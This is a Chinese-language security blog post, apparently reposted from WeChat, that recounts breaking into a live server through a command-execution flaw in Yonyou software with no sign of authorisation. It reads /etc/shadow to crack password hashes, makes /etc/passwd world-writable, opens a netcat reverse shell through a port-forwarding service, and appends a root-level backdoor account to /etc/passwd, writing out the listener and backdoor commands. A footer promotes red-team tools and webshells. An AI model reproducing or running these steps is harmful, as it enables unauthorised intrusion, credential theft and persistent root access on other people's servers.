小技巧 | 记一次实战中利用RCE漏洞GetShell并提权
2023-11-30 08:8:56 Author: 系统安全运维(查看原文) 阅读量:10 收藏

某站用友的命令执行漏洞,测试print hello发现可以执行命令

whami id 都查一波权限,发现是root权限这么大,很好搞啊


ps -ef|grep sshd 查一波 发现可以ssh连接,直接useradd 用户,但是整个shell无法给用户添加密码,无法远程登录,怎么搞,直接读shadow哈希,爆破密码
爆破无结果,头大,怎么搞,思考5分钟,可以直接写passwd啊,试一波
再次查看shadow 居然没写进去,难道权限不对,ls -alrt /etc/passwd 发现权限是544 ,直接chmod 777 /etc/passwd 改权限,继续写,依然写不进去,换了各种姿势,都不行,难住我了,突然想起了nc反弹,一般linux都装有nc,这个有没有,查一波
果然不错,有nc,通过dnslog查一下是否有外连
能ping通,果然能外连,那就可以通过nc反弹搞一波了,本地的攻击机在内网,内网穿透一波
我一般用https://www.uulap.com/ 大家可以试试
将本地的6666口映射到公网
本地建立监听 nc -l -n -v -p 6666
让目标机进行nc反弹
果然反弹回来了,直接上命令,加用户
echo ‘用户名:LRxM3nP3LOiYU:0:0:hello:/root:/bin/bash’ >> /etc/passwd
查看已经添加成功
直接ssh连接,发现是阿里云的服务器
至此结束收工!

文章转自巡安似海

如有侵权,请联系删除

好文推荐

红队打点评估工具推荐
干货|红队项目日常渗透笔记
实战|后台getshell+提权一把梭
一款漏洞查找器(挖漏洞的有力工具)
神兵利器 | 附下载 · 红队信息搜集扫描打点利器
神兵利器 | 分享 直接上手就用的内存马(附下载)
推荐一款自动向hackerone发送漏洞报告的扫描器
关注我,学习网络安全不迷路

文章来源: http://mp.weixin.qq.com/s?__biz=Mzk0NjE0NDc5OQ==&mid=2247522379&idx=1&sn=4f97b83f5b49923cdc001c0c1803efb8&chksm=c3084b3bf47fc22daf6d4f590dcae333c1924cf8c8ef75390726387fce683707ba0cf8ea71e7&scene=0&xtrack=1#rd
如有侵权请联系:admin#unsafe.sh